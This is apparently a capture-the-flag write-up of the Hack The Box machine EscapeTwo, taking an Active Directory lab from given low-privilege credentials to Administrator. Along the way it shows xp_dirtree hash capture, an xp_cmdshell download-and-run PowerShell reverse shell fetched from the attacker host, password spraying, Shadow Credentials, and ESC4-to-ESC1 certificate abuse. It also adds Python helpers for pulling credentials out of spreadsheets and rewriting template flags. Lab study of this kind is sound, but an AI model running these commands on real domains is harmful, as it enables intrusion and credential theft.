HTB - EscapeTwo

Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 20:09:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T19:33:09
|_Not valid after: 2055-01-13T19:33:09
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Summary
* Open ports: 53-88-135-139-389-445-464-593-636-1433-3268-3269-5985
* UDP open ports:
* Services: DNS - KERBEROS - LDAP - SMB - MSSQL - winRM - LDAPS
* Important notes: Domain: sequel.htb - DNS:DC01.sequel.htb - Microsoft SQL Server 2019
hosts file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $sudo sh -c "echo '$ip DC01 sequel.htb DC01.sequel.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $tail -n 1 /etc/hosts
10.10.11.51 DC01 sequel.htb DC01.sequel.htb
Foothold
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
With the provided credentials, I will try to authenticate to the exposed services (SMB, MSSQL, LDAP, etc.).
MSSQL
(impacket) ┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $mssqlclient.py sequel.htb/rose:KxEPkKe6R8su@dc01 -windows-auth
SQL (SEQUEL\rose guest@master)>
rose is only a guest on the master database, so I first tried to capture the NetNTLMv2 hash of the SQL Server service account: xp_dirtree makes the service account authenticate to a UNC path, so pointing it at an SMB server on my attacking machine leaks the hash.
sudo impacket-smbserver -smb2support share $(pwd)
xp_dirtree \\10.10.16.75\file.txt
I received the hash but could not crack it, so I moved on to other things.

Next, I dumped the LDAP data with ldapdomaindump and collected BloodHound data with bloodhound-python to enumerate the domain:
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ldapdomaindump ldap://$ip -u "sequel.htb\rose" -p 'KxEPkKe6R8su'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $bloodhound-python -u rose -p KxEPkKe6R8su -ns $ip -d sequel.htb -c all --zip
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
I also requested service tickets for the Kerberoastable accounts (there were two), but I could not crack those hashes either.

It is also worth checking whether AD CS is deployed, since misconfigured certificate templates open many escalation paths. The nxc adcs module searches LDAP for enrollment services:
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nxc ldap 10.10.11.51 -u rose -p 'KxEPkKe6R8su' -M adcs
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.51 389 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
ADCS 10.10.11.51 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.51 389 DC01 Found PKI Enrollment Server: DC01.sequel.htb
ADCS 10.10.11.51 389 DC01 Found CN: sequel-DC01-CA
I also listed the SMB shares with my credentials and found I have read access to two of them:

In the Accounting Department share there is an accounts.xlsx file. Opening it with Microsoft Excel or any other xlsx viewer failed with a "file is corrupted" error. Since an xlsx is a ZIP container of XML parts, I unzipped it and searched the parts for anything interesting:
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo/xlsx]
└──╼ $ls
accounting_2024.xlsx accounts.xlsx
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo/xlsx]
└──╼ $unzip accounts.xlsx
Archive: accounts.xlsx
inflating: xl/workbook.xml
inflating: xl/theme/theme1.xml
inflating: xl/styles.xml
inflating: xl/worksheets/_rels/sheet1.xml.rels
inflating: xl/worksheets/sheet1.xml
inflating: xl/sharedStrings.xml
inflating: _rels/.rels
inflating: docProps/core.xml
inflating: docProps/app.xml
inflating: docProps/custom.xml
inflating: [Content_Types].xml
Inside xl/sharedStrings.xml (the table where every text cell of the workbook is stored once) there are several credentials:
Angela:0fwz7Q4mxxxxxx
0scar:86LxLBMxxxxxxx
kevin:Md9Wlq1xxxxxxxxx
sa:MSSQLP@xxxxxxx
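The same recovery done programmatically, as an added example that is not part of the original write-up: an xlsx sheet refers to xl/sharedStrings.xml by index, so resolving those references against sheet1.xml rebuilds the rows instead of leaving a flat list of strings. The parser never touches the parts a spreadsheet application validates ([Content_Types].xml, rels, styles), which is why a file Excel calls corrupted still yields its data. The workbook and accounts below are constructed for the example and are not the real accounts.xlsx.

```python
"""Recover cell text from an .xlsx that Excel refuses to open.

Added example for this write-up; not the author's code. The workbook below is
constructed inline (made-up accounts) so the script runs offline.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
T_TAG = "{%s}t" % NS["m"]
ROW_TAG = "{%s}row" % NS["m"]

# --- constructed sample workbook: only the two parts the parser needs ---
SST_XML = """<sst xmlns="%s" count="9" uniqueCount="9">
<si><t>First Name</t></si><si><t>Username</t></si><si><t>Password</t></si>
<si><t>Alice</t></si><si><t>alice</t></si><si><t>Winter2024!</t></si>
<si><t>Bob</t></si><si><r><t>svc_</t></r><r><t>backup</t></r></si><si><t>B4ckup#1</t></si>
</sst>""" % NS["m"]

SHEET_XML = """<worksheet xmlns="%s"><sheetData>
<row r="1"><c r="A1" t="s"><v>0</v></c><c r="B1" t="s"><v>1</v></c><c r="C1" t="s"><v>2</v></c></row>
<row r="2"><c r="A2" t="s"><v>3</v></c><c r="B2" t="s"><v>4</v></c><c r="C2" t="s"><v>5</v></c></row>
<row r="3"><c r="A3" t="s"><v>6</v></c><c r="B3" t="s"><v>7</v></c><c r="C3" t="s"><v>8</v></c></row>
<row r="4"><c r="A4" t="s"><v>6</v></c><c r="B4"><v>1433</v></c></row>
</sheetData></worksheet>""" % NS["m"]


def build_sample_xlsx():
    """Zip the two parts into an in-memory .xlsx (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/sharedStrings.xml", SST_XML)
        z.writestr("xl/worksheets/sheet1.xml", SHEET_XML)
    return buf.getvalue()


def shared_strings(z):
    """Return the shared-string table as a list; list index == <si> position.
    A <si> holds either a single <t> or several rich-text <r><t> runs to join."""
    root = ET.fromstring(z.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(T_TAG))
            for si in root.findall("m:si", NS)]


def extract_rows(xlsx_bytes, sheet="xl/worksheets/sheet1.xml"):
    """Return the sheet as a list of {column_letter: value} dicts, with
    t="s" shared-string references resolved and other cells kept as text."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        sst = shared_strings(z)
        root = ET.fromstring(z.read(sheet))
    rows = []
    for row in root.iter(ROW_TAG):
        cells = {}
        for c in row.findall("m:c", NS):
            v = c.find("m:v", NS)
            m = re.match(r"[A-Z]+", c.get("r", ""))
            if v is None or v.text is None or m is None:
                continue  # empty or malformed cell
            cells[m.group(0)] = sst[int(v.text)] if c.get("t") == "s" else v.text
        if cells:
            rows.append(cells)
    return rows


def find_credentials(rows):
    """Pick the user and password columns from the header row and return
    (user, password) pairs; rows missing either column are skipped."""
    if not rows:
        return []
    header = rows[0]

    def column_named(*needles):
        for col, name in header.items():
            if any(n in name.lower() for n in needles):
                return col
        return None

    ucol = column_named("user", "login", "email")
    pcol = column_named("pass", "pwd")
    if ucol is None or pcol is None:
        return []
    return [(r[ucol], r[pcol]) for r in rows[1:] if ucol in r and pcol in r]


if __name__ == "__main__":
    for user, pw in find_credentials(extract_rows(build_sample_xlsx())):
        print(f"{user}:{pw}")
```

Against a real file, pass the bytes of the downloaded workbook to extract_rows; if the header uses other column names, adjust the needles in find_credentials.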
Lateral Movement
Using the sa account, I can log in to the MSSQL instance as sysadmin.

Impacket v0.12.0 has built-in helper commands for common MSSQL attacks. I will use enable_xp_cmdshell, which runs sp_configure for 'show advanced options' and 'xp_cmdshell' (the "changed from 1 to 1" messages below show both were already enabled on this instance):
SQL (sa dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svc
I will host a PowerShell reverse shell on my web server and download it to the target. To generate the reverse shell with PowerJoker:
python3 /opt/PowerJoker/PowerJoker.py -l 10.10.16.84 -p 1337
Download and execute the shell:
SQL (sa dbo@master)> xp_cmdshell powershell -c iwr http://10.10.16.84/shell.ps1 -o C:\programdata\rev.ps1
SQL (sa dbo@master)> xp_cmdshell powershell -c C:\programdata\rev.ps1
Receive the connection:
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $rlwrap -cAr nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.84] from (UNKNOWN) [10.10.11.51] 54422
JokerShell C:\Windows\system32>
Under C:\ there is a SQL2019 folder:
JokerShell C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/5/2022 12:03 PM PerfLogs
d-r--- 1/4/2025 7:11 AM Program Files
d----- 6/9/2024 8:37 AM Program Files (x86)
d----- 6/8/2024 3:07 PM SQL2019
d-r--- 6/9/2024 6:42 AM Users
d----- 1/4/2025 8:10 AM Windows
Inside it is the SQL Server setup configuration file, sql-Configuration.INI. Setup configuration files like this one store the service account and its password (SQLSVCPASSWORD) in plain text, and here it holds the password of sql_svc, the account my shell is running as:
JokerShell C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
..snip..
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6Cxxxxxxxxx"
Service account passwords are often reused, so I will spray this one against the other domain users collected earlier. It is reused by ryan, who is allowed to log in over WinRM:

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6xxxxxxxxxx'
*Evil-WinRM* PS C:\Users\ryan\Desktop> cat user.txt
87443ae9f1bdec35xxxxxxxxxxxxxxxx
User Flag: 87443ae9f1bdec35xxxxxxxxxxxxxxxx
Privilege Escalation
I will use powerview.py to manually enumerate ryan's privileges:
(powerview.py) ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $python3 /opt/powerview.py/powerview.py sequel.htb/ryan:'WqSZAF6Cyzzzzzzzz'@10.10.11.51
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Get-DomainUser -Identity ryan -Select ObjectSid
S-1-5-21-548670397-972687484-3496335370-1114
Ryan has WriteOwner on ca_svc.

With WriteOwner, I can make ryan the owner of ca_svc, then grant him FullControl over the object, and after that take over the account with Shadow Credentials, a password reset, or targeted Kerberoasting. Shadow Credentials is the quietest option: it leaves the account's password untouched, so nothing that relies on ca_svc breaks (it does require the DC to support PKINIT, which AD CS environments normally do).
Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114
Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights fullcontrol
Then I get the NT hash of ca_svc with the Shadow Credentials attack (add a key credential to msDS-KeyCredentialLink, authenticate with PKINIT, and recover the NT hash via U2U).

With the ca_svc hash, I can authenticate to the domain and enumerate AD CS for vulnerable templates:
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $certipy find -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508xxxxxxxxxxx -stdout -vulnerable
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
..snip..
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
So the template is vulnerable to ESC4: Cert Publishers has write access to the template object, and with the ca_svc account I can exercise it to rewrite the template's attributes and make it vulnerable to ESC1. ESC1 is a template that lets the enrollee supply the Subject Alternative Name, requires no manager approval or authorized signature, and carries an EKU usable for domain authentication; a low-privileged enrollee then requests a certificate with Administrator's UPN in the SAN and uses it to authenticate as Administrator. After changing the template accordingly (and saving its original configuration so it can be restored afterwards), I request the certificate:
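The attribute changes behind the ESC4-to-ESC1 step, as an added example that is not from the original write-up or from Certipy: the flag names and bit values are the documented AD CS template schema values, SAMPLE is a constructed template (not a dump of DunderMifflinAuthentication), and enrollment rights on the template ACL are assumed rather than modelled.

```python
"""Which template attributes make ESC1 possible, and what an ESC4 write changes.

Added example for this write-up; not the author's code and not part of Certipy.
SAMPLE is a constructed template, not the real DunderMifflinAuthentication.
"""

# msPKI-Certificate-Name-Flag bits
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # requester chooses subject / SAN
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000     # CA builds the SAN from the AD object
# msPKI-Enrollment-Flag bits
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # CA manager approval required
CT_FLAG_AUTO_ENROLLMENT = 0x00000020

# EKUs that let the issued certificate authenticate to AD (PKINIT / Schannel)
CLIENT_AUTH_EKU = "1.3.6.1.5.5.7.3.2"
AUTH_EKUS = {
    CLIENT_AUTH_EKU,           # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}


def esc1_blockers(t):
    """Return the conditions that still prevent ESC1 on template t.
    An empty list means an enrollee can request a certificate with an
    arbitrary UPN in the SAN and use it to authenticate as that principal."""
    blockers = []
    if not t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        blockers.append("enrollee cannot supply the SAN")
    if t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        blockers.append("manager approval required")
    if t["msPKI-RA-Signature"] > 0:
        blockers.append("authorized signature required")
    ekus = set(t["pKIExtendedKeyUsage"])
    if ekus and not ekus & AUTH_EKUS:   # an empty EKU list means "any purpose"
        blockers.append("no authentication EKU")
    return blockers


def apply_esc4_write(t):
    """Return a copy of t with the attribute changes an attacker holding write
    access to the template object (ESC4) makes to turn it into ESC1."""
    w = dict(t)
    w["msPKI-Certificate-Name-Flag"] |= CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    w["msPKI-Enrollment-Flag"] &= ~CT_FLAG_PEND_ALL_REQUESTS
    w["msPKI-RA-Signature"] = 0
    ekus = list(w["pKIExtendedKeyUsage"])
    if ekus and not set(ekus) & AUTH_EKUS:
        ekus.append(CLIENT_AUTH_EKU)
    w["pKIExtendedKeyUsage"] = ekus
    return w


def changed_attributes(before, after):
    """The attributes that must be written back to restore the template."""
    return {k: (before[k], after[k]) for k in after if before[k] != after[k]}


# Constructed template: the CA fills the SAN from AD and requires approval.
SAMPLE = {
    "cn": "ExampleAuthentication",
    "msPKI-Certificate-Name-Flag": CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS | CT_FLAG_AUTO_ENROLLMENT,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": [CLIENT_AUTH_EKU],
}

if __name__ == "__main__":
    print("before:", esc1_blockers(SAMPLE))
    weak = apply_esc4_write(SAMPLE)
    print("after: ", esc1_blockers(weak))
    for attr, (old, new) in changed_attributes(SAMPLE, weak).items():
        print(attr, hex(old), "->", hex(new))
```

Certipy's template command performs this write over LDAP and, with -save-old, keeps the original configuration so the template can be restored once the certificate is issued; put the template back as part of cleanup, since the modified state is exactly what certipy find -vulnerable flags as ESC1 for everyone else too.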
certipy req -u 'ca_svc@sequel.htb' -hashes :3b181b914e7a9d5xxxxxxxxxxxxx7fce -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb
Get the Administrator hash by authenticating with the certificate (PKINIT for a TGT, then U2U to recover the NT hash):
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ certipy auth -pfx administrator.pfx -username Administrator -domain sequel.htb
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed40xxxxxxxxxxxx
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $evil-winrm -i 10.10.11.51 -u administrator -H 7a8d4e04986afa8ed40xxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
eff768f0b89d396c3xxxxxxxxxxxxxxxxxx
Root Flag: eff768f0b89d396c3xxxxxxxxxxxxxxxxxx